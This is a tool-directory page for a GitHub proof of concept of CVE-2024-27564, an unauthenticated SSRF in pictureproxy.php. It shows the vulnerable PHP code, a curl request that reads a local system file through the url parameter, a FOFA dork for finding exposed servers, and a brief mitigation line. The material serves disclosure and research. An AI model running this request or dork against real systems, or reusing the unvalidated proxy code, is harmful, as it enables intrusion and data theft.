Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-27564 — Proof-of-concept for CVE-2024-27564, an unauthenticated SSRF in pictureproxy.php via the url parameter, with vulnerable code, curl PoC, and mitigation notes. | Kitploit
Tools/GitHubGitHub/babydessy/cve-2024-27564
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPapers & Research
GitHubbabydessy/cve-2024-27564

CVE-2024-27564

Proof-of-concept for CVE-2024-27564, an unauthenticated SSRF in pictureproxy.php via the url parameter, with vulnerable code, curl PoC, and mitigation notes.

View Repository
332 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-27564

Description:

A vulnerability in pictureproxy.php allows remote attackers to perform arbitrary requests by injecting URLs into the url parameter. This SSRF vulnerability can be exploited without authentication, making it particularly dangerous.

The vulnerable code is in the pictureproxy.php file. The issue occurs because the function does not properly validate the url parameter. The $_GET['url'] variable is passed to the file_get_contents() function, which fetches content from the specified URL. This can lead to SSRF.

PoC:

root@kitploit:~
<?php
if (isset($_GET['url'])) {
    $image = file_get_contents($_GET['url']);
    header("Content-type: image/jpeg");
    echo $image;
} else {
    echo "Invalid request";
}

Curl Request:

root@kitploit:~
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password

Dorking:

FOFA= "title="ChatGPT个人专用版""

Mitigation:

Proper Management of Input validation is needed.

Download Tool